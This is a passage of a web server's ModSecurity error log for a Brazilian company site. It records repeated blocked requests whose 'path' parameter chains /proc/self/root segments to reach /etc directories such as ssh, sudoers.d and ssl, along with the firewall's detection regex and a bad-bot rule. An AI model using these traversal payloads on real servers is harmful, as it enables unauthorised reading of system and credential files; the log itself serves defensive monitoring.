"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlQFajLEzk2WiQ-10pLwAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:17:09.763412 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.243.203:34414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlRaTCbgAP5jq5TehDYwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:17:13.493505 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:47396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlSaTCbgAP5jq5TehDaQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:17:47.176062 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:55518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhla7ysWC90G-1nBrBbFAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:17:50.851896 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:47018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlblajLEzk2WiQ-10pWgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:17:55.959480 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:47034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlc6TCbgAP5jq5TehDeQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:18:04.527434 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:47036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlfLysWC90G-1nBrBbIQAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:18:06.118477 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.241.46:42942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlfs_BxrYCr4hPDw8A2gAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:18:08.466286 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:42948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlgP9ocpUE4ed4uDwJXwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:18:24.271488 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:41804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlkEr9dMAiw-8KANNeVQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:18:40.675344 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:41028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhloKQpVkWug9HeOt9MXgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:18:44.375533 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:36372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlpI6lpbStxTqkSkuBSgAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:18:48.019186 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:36376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlqLysWC90G-1nBrBbJwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:18:57.050965 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:46712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlsf9ocpUE4ed4uDwJjgAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:19:09.335873 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:53202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhlvaTCbgAP5jq5TehDiQAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:19:38.991494 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:55862] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhl2o6lpbStxTqkSkuBYAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:19:50.955279 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.241.46:40894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhl5lajLEzk2WiQ-10pjgAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:19:55.378932 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.244.31:41010] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhl6s_BxrYCr4hPDw8BWgAAAcE"]
[Mon Mar 16 17:20:00.321317 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:51956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhl8LABkC4fWIHEf8EL9gAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:20:03.697475 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.243.203:35404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhl80r9dMAiw-8KANNebQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:20:29.335698 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:60950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmDY6lpbStxTqkSkuBhAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:20:32.947292 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:34078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmEKTCbgAP5jq5TehDngAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:20:35.953622 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:34084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmE9SswJuvopo3lOh2PwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
